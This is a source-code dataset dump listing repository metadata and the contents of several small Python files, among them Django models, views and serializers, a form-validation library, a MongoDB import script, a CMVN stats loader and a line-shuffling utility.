blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f54412f85eb9a15ea9f8d417b06cf52653f0ab70 | afcad0132386caba80237f09280c649dd793f6db | /services/scraper/export.py | 284ab29423be231e7ec7defba1235d3742fe6e35 | [] | no_license | chimano/happy-bnb | 8b3bce7495a8dd8781cb6099b89b793f6feedf41 | e0ce7f8d4d1ae93746ebc01a3fe350c44602f5a5 | refs/heads/master | 2020-04-17T13:21:36.003284 | 2019-01-21T05:06:51 | 2019-01-21T05:09:21 | 166,612,324 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | from sys import argv
from ast import literal_eval
import pymongo
URL_FORMAT = 'mongodb://{}/'
def categorize(entry):
return 'high' if float(entry[0]) > 4 else 'low'
if __name__ == '__main__':
if not argv or not len(argv) == 5:
print('Usage: python export.py HOST:PORT DATABASE COLLECTION IMPORT_FILE')
url, db, coll, import_file = argv[1:]
client = pymongo.MongoClient(URL_FORMAT.format(url))[db][coll]
with open(import_file, 'r') as file:
data = literal_eval(file.readlines()[0])
processed_data = [
{'rating': float(entry[0]),
'latitude': float(entry[1]),
'longitude': float(entry[2]),
'category': categorize(entry)}
for entry in data.values()
]
client.insert_many(processed_data)
| [
"lucas_turpin@hotmail.com"
] | lucas_turpin@hotmail.com |
30dbf2c9ddf45492b2c4906ac69c6fdaf6cf3b0c | 9547f82dc5a81bdc19ba5442d41518a81b518825 | /consecucion_traspaso/models.py | e3468724b015cae28f71774b7f879788abe68b5d | [] | no_license | luisfarfan/capacitacion | 12784f95564eda1dc38dc22aa518b99d4b315c75 | c93e4502476c02bb3755a68d84404453b2c2dd81 | refs/heads/master | 2021-01-11T04:17:15.476849 | 2017-02-14T01:13:27 | 2017-02-14T01:13:27 | 71,189,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,823 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class PersonalCapacitacion(models.Model):
id_per = models.IntegerField(primary_key=True)
dni = models.CharField(max_length=8, blank=True, null=True)
ape_paterno = models.CharField(max_length=100, blank=True, null=True, db_column='ape_paterno')
ape_materno = models.CharField(max_length=100, blank=True, null=True, db_column='ape_materno')
nombre = models.CharField(max_length=100, blank=True, null=True, db_column='nombre')
id_cargofuncional = models.IntegerField()
id_convocatoriacargo = models.IntegerField()
zona = models.CharField(max_length=5, blank=True, null=True)
contingencia = models.IntegerField(blank=True, null=True)
ubigeo = models.CharField(max_length=6)
class Meta:
managed = False
db_table = 'v_personal_capacitacion'
class MetaSeleccion(models.Model):
ccdd = models.CharField(max_length=2, blank=True, null=True)
ccpp = models.CharField(max_length=2, blank=True, null=True)
ccdi = models.CharField(max_length=2, blank=True, null=True)
ubigeo = models.CharField(max_length=6, blank=True, null=True)
id_convocatoriacargo = models.IntegerField()
id_cargofuncional = models.IntegerField()
meta = models.IntegerField()
class Meta:
managed = False
db_table = 'meta_seleccion'
# bandaprob
# 3 = ALTA
# 4 = BAJA
class Ficha177(models.Model):
id_per = models.IntegerField(primary_key=True)
id_convocatoriacargo = models.IntegerField()
capacita = models.IntegerField()
notacap = models.FloatField()
seleccionado = models.IntegerField()
sw_titu = models.IntegerField()
bandaprob = models.IntegerField()
class Meta:
managed = False
db_table = 'ficha_177'
| [
"lucho.farfan9@gmail.com"
] | lucho.farfan9@gmail.com |
f16bb51a8835137aba50c21bb060c677a7604e02 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_musses.py | b1ce3e681289e77be9498786f527b925bf9b01de | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py |
#calss header
class _MUSSES():
def __init__(self,):
self.name = "MUSSES"
self.definitions = muss
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['muss']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
fb1d4bb2df0be442fc7945067e0d14571cdc9dd6 | 6a1601d01e9ff7dbc6eeff9964ccdb8b182b5fb4 | /elections/views.py | a3698d33ae21468251a84b03523936788ab2908a | [] | no_license | Devourchoi/0902 | 41d55b41b16db467cd07693669c752fef3ba7436 | 9e63fc85cb9e4e9301c874dcdc8e6fed9a5e36e3 | refs/heads/master | 2022-12-16T23:15:00.625899 | 2020-09-05T00:56:20 | 2020-09-05T00:56:20 | 292,975,891 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | from django.shortcuts import render
from django.http import HttpResponse
from .models import M1Question
def index(request):
m1questions = M1Question.objects.all()
context = {'m1questions':m1questions}
return render(request, 'elections/index.html', context)
def M1QDs(request, M1QD):
return HttpResponse(M1QD)
def vote(request):
m1questions = M1Question.objects.all()
selected_choice = request.POST['choice']
if selected_choice == "One":
M1Question.One = True
elif selected_choice == "Two":
M1Question.Two = True
elif selected_choice == "Three":
M1Question.Three = True
elif selected_choice == "Four":
M1Question.Four = True
elif selected_choice == "Five":
M1Question.Four = True
return HttpResponse(M1Question.Three) | [
"cih9144@naver.com"
] | cih9144@naver.com |
b49b688fcabbaedc2a8bfc477ba05c6aa46b4a66 | d4d3a649bd66315d8b273a6b473c5ed024d2e86e | /searchkeyws/serializers.py | 4fa9b6362347c0f2b20f43d056ccc963deaa30be | [] | no_license | Leanwit/gisiaws | 934e5ef4b3fd42346927847d44af17d219a51c77 | 8863bfcb03a00ee343968746a4f7902592d8099f | refs/heads/master | 2021-01-14T10:03:51.648179 | 2016-04-24T15:34:06 | 2016-04-24T15:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | from rest_framework import serializers
from searchkeyws.models import *
class SearchKeySerializer(serializers.ModelSerializer):
class Meta:
model = SearchKey
fields = ('id', 'clave')
class SearchUrlSerializer(serializers.ModelSerializer):
class Meta:
model = SearchUrl
fields = ('url',)
class FilteredUrlSerializer(serializers.ModelSerializer):
class Meta:
model = FilteredUrl
fields = ('orden', 'url')
class SearchResultSerializer(serializers.ModelSerializer):
urls = SearchUrlSerializer(many=True)
class Meta:
model = SearchResult
fields = ('buscador', 'urls')
class WSRequestSerializer(serializers.ModelSerializer):
claves = SearchKeySerializer(many=True)
class Meta:
model = WSRequest
fields = ('id_proyecto', 'nombre_directorio', 'claves')
def create(self, validated_data):
claves = validated_data.pop('claves')
request = WSRequest.objects.create(**validated_data)
for key in claves:
SearchKey.objects.create(request=request, **key)
return request
class WSResponseSerializer(serializers.ModelSerializer):
buscadores = SearchResultSerializer(many=True)
class Meta:
model = WSResponse
fields = ('id_proyecto', 'buscadores')
def create(self, validated_data):
buscadores = validated_data.pop('buscadores')
wsreponse = WSResponse.objects.create(**validated_data)
for buscador in buscadores:
urls = buscador.pop('urls')
result = SearchResult.objects.create(response=wsreponse, **buscador)
for url in urls:
SearchUrl.objects.create(searchresult=result, **url)
return wsreponse
class WSFilteredUrlsRequestSerializer(serializers.ModelSerializer):
urls = FilteredUrlSerializer(many=True)
class Meta:
model = WSFilteredUrlsRequest
fields = ('id_proyecto', 'nombre_directorio', 'urls')
def create(self, validated_data):
urls = validated_data.pop('urls')
request = WSFilteredUrlsRequest.objects.create(**validated_data)
for url in urls:
FilteredUrl.objects.create(request=request, **url)
return request
| [
"luislezcair@gmail.com"
] | luislezcair@gmail.com |
256c5f55fe05774426ef35b4325026001409ec73 | b33c52cba0eb0bb2d205c7ccd0df4bc8bfe2eb97 | /laravalidation/validation.py | f2b79aa8d18c098391379e73de9526c1ee808cc2 | [
"MIT"
] | permissive | kristopherchun/laravalidation | 718cad923f8f9b6b6b03d2018fb415d27256ed3e | 2a68a0b132428759954dfed7404e45d3841f51b7 | refs/heads/master | 2020-05-20T00:40:35.291042 | 2019-05-07T18:33:57 | 2019-05-07T18:33:57 | 185,278,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,169 | py | import re
import datetime
import sys
import json
import os
class Validation():
# List to store the error messages in
response = {}
errors = {}
error_message_templates = {}
def validate(self, data, rules, custom_messages=None):
"""Validate the 'data' according to the 'rules' given, returns a list of errors named 'errors'"""
self.error_message_templates = json.loads('''{
"required": "The %s field is required.",
"required_if": "The %s field is required with.",
"confirmed": "The %s confirmation does not match.",
"max": "The %s may not be greater than %s characters.",
"min": "The %s must be at least %s characters.",
"email": "The %s must be a valid email address.",
"integer": "The %s must be an integer.",
"alpha": "The %s may only contain letters.",
"alpha_num": "The %s may only contain letters and numbers.",
"after": "'%s' is an invalid after date",
"before": "'%s' is an invalid before date ",
"between": "'%s' has an invalid value for between field",
"boolean": "'%s' has invalid value for boolean field",
"date": "'%s' value does not match date format",
"different": "'%s' has invalid value for same rule ",
"in": "'%s' has invalid value for in rule",
"ip": "'%s' must be a valid IP address",
"not_in": "'%s' has invalid value for not_in rule",
"present": "The data dictionary must have a nullable field name '%s'",
"phone": "'%s' must be a valid Phone Number",
"regex": "'%s' field does not match the RE ",
"same": "'%s' has invalid value for same rule",
"size": "'%s' has invalid value for size rule",
"website": "'%s' must be a valid Website URL",
"no_field": "No field named '%s' to validate for %s rule"
}''')
if not custom_messages:
self.custom_error_messages = json.loads('''{
"_comment": "You did not provide any field named <feld_name> in your data dictionary",
"field_name.rule":"You did not provide any field named field_name in your data dictionary",
"month_day.regex":"You did not provide any field named month_day in your data dictionary",
"phone.max":"You did not provide any field named phone in your data dictionary",
"month_day.required":"You did not provide any field named month_day in your data dictionary",
"new_password_confirmation.same":"You did not provide any field named new_password_confirmation in your data dictionary",
"phone.no_field":"You did not provide any field named phone in your data dictionary",
"birthday.date_format":"You did not provide any field named birthday in your data dictionary",
"new_password.alpha":"field new_password can only have alphabet values",
"host.no_field":"You did not provide any field named host in your data dictionary",
"email.no_field":"You did not provide any field named email in your data dictionary",
"nationality.no_field":"You did not provide any field named nationality in your data dictionary",
"active.no_field":"You did not provide any field named active in your data dictionary",
"age.no_field":"You did not provide any field named age in your data dictionary"
}''')
else:
self.custom_error_messages = custom_messages
# field_errors will keep the errors for a particular field, which will be appended to the main "errors" list
field_errors = {}
# iterate through the rules dictionary, fetching each rule name (dictionary key) one by one
for field_name in rules:
# fetch the rule (value of dictionary element) from "rules" dictionary for the current rule name (dictionary key) and split it to get a list
field_rules = rules[field_name].split('|')
# now looping through rules of one field one rule at a time with each iteration
for rule in field_rules:
# validate the data based on the rule assigned
if rule.startswith("after"):
field_error = self.__validate_after_date_fields(data, field_name, field_rules, rule)
elif rule == "alpha":
field_error = self.__validate_alpha_fields(data, field_name)
elif rule == "alpha_num":
field_error = self.__validate_alpha_num_fields(data, field_name)
elif rule.startswith("before"):
field_error = self.__validate_before_date_fields(data, field_name, field_rules, rule)
elif rule.startswith("between"):
field_error = self.__validate_between_fields(data, field_name, rule)
elif rule == "boolean":
field_error = self.__validate_boolean_fields(data, field_name)
elif rule.startswith("confirmed"):
field_error = self.__validate_confirmed_fields(data, field_name)
elif rule == "date":
field_error = self.__validate_date_fields(data, field_name, field_rules)
elif rule == "integer":
field_error = self.__validate_integer_fields(data, field_name)
elif rule.startswith("different"):
field_error = self.__validate_different_fields(data, field_name, rule)
elif rule == "email":
field_error = self.__validate_email_fields(data, field_name)
elif rule.startswith("in"):
field_error = self.__validate_in_fields(data, field_name, rule)
elif rule == "ip":
field_error = self.__validate_ip_fields(data, field_name)
elif rule.startswith("max"):
field_error = self.__validate_max_fields(data, field_name, rule)
elif rule.startswith("min"):
field_error = self.__validate_min_fields(data, field_name, rule)
elif rule.startswith("not_in"):
field_error = self.__validate_not_in_fields(data, field_name, rule)
elif rule == "present":
field_error = self.__validate_present_fields(data, field_name)
elif rule == "phone":
field_error = self.__validate_phone_fields(data, field_name)
elif rule.startswith("regex"):
field_error = self.__validate_regex_fields(data, field_name, rule)
elif rule == "required":
field_error = self.__validate_required_fields(data, field_name)
elif rule == "required_if":
field_error = self.__validate_required_if_fields(data, field_name)
elif rule.startswith("same"):
field_error = self.__validate_same_fields(data, field_name, rule)
elif rule.startswith("size"):
field_error = self.__validate_size_fields(data, field_name, rule)
elif rule == "website":
field_error = self.__validate_website_fields(data, field_name)
if field_error:
if field_name not in field_errors:
field_errors[field_name] = []
field_errors[field_name].extend(field_error)
if field_errors:
return field_errors
return {}
def __validate_required_fields(self, data, field_name):
"""Used for validating required fields, returns a list of error messages"""
errs = []
try:
if data[field_name] == '':
errs.append(self.return_field_message(field_name, "required"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'required'))
return errs
def __validate_required_if_fields(self, data, field_name):
"""Used for validating required fields, returns a list of error messages"""
errs = []
try:
if data[field_name] == '':
errs.append(self.return_field_message(field_name, "required_if"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'required_if'))
return errs
def __validate_date_fields(self, data, field_name, field_rules):
"""Used for validating date fields, returns a list of error messages"""
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
datetime.datetime.strptime(data[field_name], date_format)
except ValueError:
errs.append(self.return_field_message(field_name, "date"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'date'))
return errs
def __validate_before_date_fields(self, data, field_name, field_rules, rule):
"""Used for validating fields for a date before the specified date value, returns a list of error messages"""
# retrieve the value for that before rule
before_date_value = rule.split(':')[1]
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
date_entered = datetime.datetime.strptime(
data[field_name], date_format).date()
before_date = datetime.datetime.strptime(
before_date_value, date_format).date()
if date_entered >= before_date:
errs.append(self.return_field_message(field_name, "before"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'before'))
except ValueError:
# because the value will not be a valid date according to the format
errs.append(self.return_field_message(field_name, "date"))
return errs
def __validate_after_date_fields(self, data, field_name, field_rules, rule):
"""Used for validating fields for a date after the specified date value, returns a list of error messages"""
# retrieve the value for that after rule
after_date_value = rule.split(':')[1]
errs = []
date_format = self.retrieve_date_format(field_rules)
try:
date_entered = datetime.datetime.strptime(
data[field_name], date_format).date()
after_date = datetime.datetime.strptime(
after_date_value, date_format).date()
if date_entered <= after_date:
errs.append(self.return_field_message(field_name, "after"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'after date'))
except ValueError:
# because the value will not be a valid date according to the format
errs.append(self.return_field_message(field_name, "date"))
return errs
def __validate_integer_fields(self, data, field_name):
"""Used for validating integer fields, returns a list of error messages"""
errs = []
try:
if not data[field_name].isdigit():
errs.append(self.return_field_message(field_name, "integer"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'integer'))
return errs
def __validate_email_fields(self, data, field_name):
"""Used for validating email fields, returns a list of error messages"""
regex = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
errs, result = self.match_regular_expression(
regex, data[field_name], "website")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "email"))
return errs
def __validate_regex_fields(self, data, field_name, rule):
"""Used for validating field data to match a regular expression, returns a list of error messages"""
regex = str(rule.split(':')[1])
errs, result = self.match_regular_expression(
regex, data[field_name], "regex")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "regex"))
return errs
def __validate_present_fields(self, data, field_name):
"""Used for validating present fields, returns a list of error messages"""
errs = []
try:
if field_name in data:
errs.append(self.return_field_message(field_name, "present"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'present'))
return errs
def __validate_boolean_fields(self, data, field_name):
"""Used for validating boolean fields, returns a list of error messages"""
errs = []
bool_values = [1, 0, "1", "0", "false", "true", False, True]
try:
if data[field_name] not in bool_values:
errs.append(self.return_field_message(field_name, "boolean"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'boolean'))
return errs
def __validate_ip_fields(self, data, field_name):
"""Used for validating fields having IP Address, returns a list of error messages"""
regex = r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"
errs, result = self.match_regular_expression(
regex, data[field_name], "ip")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "ip"))
return errs
def __validate_phone_fields(self, data, field_name):
"""Used for validating fields having phone numbers, returns a list of error messages"""
regex = r'^(?:\+?93)?[07]\d{9,13}$'
errs, result = self.match_regular_expression(
regex, data[field_name], "phone")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "phone"))
return errs
def __validate_website_fields(self, data, field_name):
"""Used for validating fields having website addresses, returns a list of error messages"""
regex = r'(http(s)?://)?([\w-]+\.)+[\w-]+[\w-]+[\.]+[\.com]+([./?%&=]*)?'
errs, result = self.match_regular_expression(
regex, data[field_name], "website")
# in case the RE did not match or their was a key error
if not result:
errs.append(self.return_field_message(field_name, "website"))
return errs
def __validate_alpha_fields(self, data, field_name):
"""Used for validating fields for alphabets only, returns a list of error messages"""
errs = []
try:
if not data[field_name].isalpha():
errs.append(self.return_field_message(field_name, "alpha"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'alpha'))
return errs
def __validate_alpha_num_fields(self, data, field_name):
"""Used for validating fields for alphabets and numbers, returns a list of error messages"""
errs = []
try:
if not data[field_name].isalnum():
errs.append(self.return_field_message(field_name, "alpha_num"))
except KeyError:
errs.append(self.return_no_field_message(
field_name, 'alpha numeric'))
return errs
def __validate_max_fields(self, data, field_name, rule):
"""Used for validating fields for a maximum integer value, returns a list of error messages"""
# retrieve the value for that max rule
max_value = int(rule.split(':')[1])
errs = []
try:
if data[field_name].isdigit():
if int(data[field_name]) > max_value:
errs.append(self.return_field_message_with_value(field_name, max_value, "max"))
else:
if len(data[field_name]) > max_value:
errs.append(self.return_field_message_with_value(field_name, max_value, "max"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'maximum'))
return errs
def __validate_min_fields(self, data, field_name, rule):
"""Used for validating fields for a minimum integer value, returns a list of error messages"""
# retrieve the value for that min rule
min_value = int(rule.split(':')[1])
errs = []
try:
if data[field_name].isdigit():
if int(data[field_name]) < min_value:
errs.append(self.return_field_message_with_value(field_name, min_value, "min"))
else:
if len(data[field_name]) < min_value:
errs.append(self.return_field_message_with_value(field_name, min_value, "min"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'minimum'))
return errs
def __validate_confirmed_fields(self, data, field_name):
"""if the field under validation is a password, a matching password_confirmation field must be present in the data,
returns a list of error messages"""
errs = []
confirmation_field = field_name + "_confirmation"
try:
if confirmation_field not in data.keys():
errs.append(self.return_field_message(field_name, "confirmed"))
if data[field_name] != data[confirmation_field]:
errs.append(self.return_field_message(field_name, "confirmed"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'confirmed'))
return errs
def __validate_size_fields(self, data, field_name, rule):
"""Used for validating fields for a maximum number of characters in a string value, returns a list of error messages"""
errs = []
try:
# retrieve the value for that size rule
size_value = int(rule.split(':')[1])
if len(data[field_name]) >= size_value:
errs.append(self.return_field_message(field_name, "size"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'size'))
except ValueError:
errs.append(self.return_field_message(field_name, "size"))
return errs
def __validate_not_in_fields(self, data, field_name, rule):
"""Used for validating fields for some number of values to avoid, returns a list of error messages"""
# retrieve the value for that not_in rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] in ls:
errs.append(self.return_field_message(field_name, 'not_in'))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'not_in'))
return errs
def __validate_in_fields(self, data, field_name, rule):
"""Used for validating fields for some number of values to allow, returns a list of error messages"""
# retrieve the value for that in rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] not in ls:
errs.append(self.return_field_message(field_name, "in"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'in'))
return errs
def __validate_different_fields(self, data, field_name, rule):
"""Used for validating fields whose value should be different than the value of some other field, returns a list of error messages"""
# retrieve the value for the different rule
ls = rule.split(':')[1].split(',')[0]
errs = []
try:
if data[field_name] == data[ls]:
errs.append(self.return_field_message(field_name, "different"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'different'))
except Exception:
errs.append("Error Occured", sys.exc_info())
return errs
def __validate_same_fields(self, data, field_name, rule):
"""Used for validating fields whose value should be the same as some other field value, returns a list of error messages"""
# retrieve the value for the same rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if data[field_name] != data[ls[0]]:
errs.append(self.return_field_message(field_name, "same"))
except KeyError:
errs.append(self.return_no_field_message(field_name, 'same'))
return errs
def __validate_between_fields(self, data, field_name, rule):
"""Used for validating fields for a number between two digits to allow, returns a list of error messages"""
# retrieve the value for the between rule
ls = rule.split(':')[1].split(',')
errs = []
try:
if int(data[field_name]) < int(ls[0]) or int(data[field_name]) > int(ls[1]):
errs.append(self.return_field_message(field_name, 'between'))
except KeyError:
errs.append(self.return_no_field_message(field_name, "between"))
except ValueError:
errs.append(field_name + " can not be empty")
return errs
def retrieve_date_format(self, field_rules):
# loop through each rule for the particular field to check if there is any date_format rule assigned
for rule in field_rules:
# if there is a date_format rule assigned then fetch the date format from that
if rule.startswith("date_format"):
df_format_index = field_rules.index(rule)
date_format = field_rules[df_format_index].split(":")[1]
return date_format
# if no date_format found, return the default date format
return '%m/%d/%Y'
def match_regular_expression(self, regex, field_name, rule_name):
comp_re = re.compile(regex, re.IGNORECASE)
errs = []
try:
result = comp_re.match(field_name)
except KeyError:
errs.append(self.return_no_field_message(field_name, rule_name))
result = "error"
return errs, result
def return_no_field_message(self, field_name, rule_name):
if field_name+".no_field" in self.custom_error_messages:
return self.custom_error_messages[field_name+".no_field"]
else:
return self.error_message_templates['no_field'] % (field_name, rule_name)
def return_field_message(self, field_name, rule_name):
if field_name+"."+rule_name in self.custom_error_messages:
return self.custom_error_messages[field_name+"."+rule_name]
else:
return self.error_message_templates[rule_name] % (field_name)
def return_field_message_with_value(self, field_name, value, rule_name):
if field_name+"."+rule_name in self.custom_error_messages:
return self.custom_error_messages[field_name+"."+rule_name]
else:
return self.error_message_templates[rule_name] % (field_name, value)
def is_valid(self, data, rules):
"""Validates the data according to the rules, returns True if the data is valid, and False if the data is invalid"""
errors = self.validate(data, rules)
if not errors:
return False
self.errors = errors
return not len(errors) > 0
| [
"kristopher.chun@dataq.ai"
] | kristopher.chun@dataq.ai |
f2f48e85360e44d5a3443a9845dae958b88ac7b3 | abf87dce5b4a0799a619a5b80b078536671bc4de | /wenet/utils/cmvn.py | d262143210dde2c73b7dabd67eba87ecdbc2a7b4 | [
"Apache-2.0"
] | permissive | fanlu/wenet | 0b784831a3cc741538c8e31680d6774163d55656 | 8c5f79449d4ab1bd31ed75814f1ea56050670a5d | refs/heads/main | 2023-07-09T07:30:00.817172 | 2021-08-23T10:36:58 | 2021-08-23T10:36:58 | 333,722,807 | 12 | 2 | Apache-2.0 | 2021-01-28T10:24:21 | 2021-01-28T10:24:20 | null | UTF-8 | Python | false | false | 2,991 | py | #!/usr/bin/env python3
# Copyright (c) 2020 Mobvoi Inc (Binbin Zhang)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import math
import numpy as np
def _load_json_cmvn(json_cmvn_file):
""" Load the json format cmvn stats file and calculate cmvn
Args:
json_cmvn_file: cmvn stats file in json format
Returns:
a numpy array of [means, vars]
"""
with open(json_cmvn_file) as f:
cmvn_stats = json.load(f)
means = cmvn_stats['mean_stat']
variance = cmvn_stats['var_stat']
count = cmvn_stats['frame_num']
for i in range(len(means)):
means[i] /= count
variance[i] = variance[i] / count - means[i] * means[i]
if variance[i] < 1.0e-20:
variance[i] = 1.0e-20
variance[i] = 1.0 / math.sqrt(variance[i])
cmvn = np.array([means, variance])
return cmvn
def _load_kaldi_cmvn(kaldi_cmvn_file):
""" Load the kaldi format cmvn stats file and calculate cmvn
Args:
kaldi_cmvn_file: kaldi text style global cmvn file, which
is generated by:
compute-cmvn-stats --binary=false scp:feats.scp global_cmvn
Returns:
a numpy array of [means, vars]
"""
means = []
variance = []
with open(kaldi_cmvn_file, 'r') as fid:
# kaldi binary file start with '\0B'
if fid.read(2) == '\0B':
logging.error('kaldi cmvn binary file is not supported, please '
'recompute it by: compute-cmvn-stats --binary=false '
' scp:feats.scp global_cmvn')
sys.exit(1)
fid.seek(0)
arr = fid.read().split()
assert (arr[0] == '[')
assert (arr[-2] == '0')
assert (arr[-1] == ']')
feat_dim = int((len(arr) - 2 - 2) / 2)
for i in range(1, feat_dim + 1):
means.append(float(arr[i]))
count = float(arr[feat_dim + 1])
for i in range(feat_dim + 2, 2 * feat_dim + 2):
variance.append(float(arr[i]))
for i in range(len(means)):
means[i] /= count
variance[i] = variance[i] / count - means[i] * means[i]
if variance[i] < 1.0e-20:
variance[i] = 1.0e-20
variance[i] = 1.0 / math.sqrt(variance[i])
cmvn = np.array([means, variance])
return cmvn
def load_cmvn(cmvn_file, is_json):
if is_json:
cmvn = _load_json_cmvn(cmvn_file)
else:
cmvn = _load_kaldi_cmvn(cmvn_file)
return cmvn[0], cmvn[1]
| [
"noreply@github.com"
] | noreply@github.com |
0c05978dfc7d7959566cd156f4599852862564c0 | 0745879ee221b431784478085ec17869fc8e87f1 | /if_else_control.py | 4d5c5ffbbb0c8e3526189d81f5c1f4a5ab510ea6 | [
"MIT"
] | permissive | joeysal/astr-119-hw-2 | 96c08c3330c4e96ce4a9d9284c2eaf897db28c1e | cb63f577370e5835c8ae027e624ad2459e71c3cb | refs/heads/main | 2022-12-26T00:26:57.474671 | 2020-10-11T23:16:09 | 2020-10-11T23:16:09 | 302,715,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #define a subroutine
def flow_control(k):
    """Print a message describing whether k equals 0, 1, or neither."""
    if k == 0:
        suffix = "equals 0."
    elif k == 1:
        suffix = "equals 1."
    else:
        suffix = "does not equal 0 or 1."
    # Build and emit the description of k.
    print("Variable k = %d %s" % (k, suffix))
#define a main function
def main():
    """Exercise flow_control() with the values 0, 1 and 2."""
    for value in (0, 1, 2):
        flow_control(value)
# Run the demo only when executed as a script (not on import).
if __name__ == "__main__":
    main()
"noreply@github.com"
] | noreply@github.com |
fa254f89e3eb04376c18b0fd50454b35cf755972 | 1ba0a95bc4369a581c7c42a1ee076768149cd201 | /shuffle_file.py | 805b085a4c3e1990c12c72ca84f1fc932f05b0a6 | [] | no_license | bhorkar/kaggle_ctr | 29122ceaa9cae0bdd9c65464bf833e7ab2f1808c | 6dc2bf413fb1bc9605462159728ad766c76b925e | refs/heads/master | 2021-01-19T08:10:38.570563 | 2014-12-24T15:06:31 | 2014-12-24T15:06:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,381 | py |
def shuffle_file(path, buff=10000000, has_header=True):
    """Shuffle the lines of a text file into ``path + '.shuffled'`` (Python 2).

    The shuffle runs in bounded memory: a random permutation of line indices
    is generated first, then the input is re-read once per ``buff``-sized
    slice of that permutation and only the matching lines are kept in memory.

    Args:
        path: input file to shuffle.
        buff: maximum number of lines held in memory per pass.
        has_header: if True, the first line is copied through unshuffled.

    NOTE(review): the output is opened in append mode ('a'), so re-running
    accumulates lines instead of overwriting -- confirm that is intended.
    """
    import random
    from datetime import datetime
    start = datetime.now()
    header = ''
    # First pass: count lines (and capture the header if present).
    with open(path) as f:
        for linecount, line in enumerate(f):
            if linecount == 0 and has_header:
                header = line
        f.close()
    if has_header:
        linecount -= 1
    print 'Found ' + str(linecount) + ' lines'
    # Random permutation of the 0-based data-line indices (header excluded).
    shuffled = range(linecount+1)
    random.shuffle(shuffled)
    with open(path + '.shuffled', 'a') as fw:
        if has_header:
            fw.write(header)
        # Process the permutation in slices of at most `buff` indices so
        # memory stays bounded; each slice costs one full scan of the input.
        for k in range(len(shuffled)/buff+1):
            print '...processing from line ' + str(k*buff) + ' to line ' + str((k+1)*buff-1)
            segment = shuffled[k*buff:(k+1)*buff]
            segment_set = set(segment) # for quicker lookup
            db = {}
            with open(path) as fr:
                for j, line in enumerate(fr):
                    if has_header:
                        if j == 0:
                            continue
                        j -= 1
                    # Keep only the lines whose index falls in this slice.
                    if j in segment_set:
                        db[str(j)] = line
                fr.close()
            # Emit the slice's lines in permutation order.
            for i in segment:
                fw.write(db[str(i)])
        fw.close()
    print 'Elapsed: ' + str(datetime.now() - start)
# Shuffle the local file "train" when run as a script.
if __name__ == "__main__":
    shuffle_file('train')
"abhijeet.bhorkar@gmail.com"
] | abhijeet.bhorkar@gmail.com |
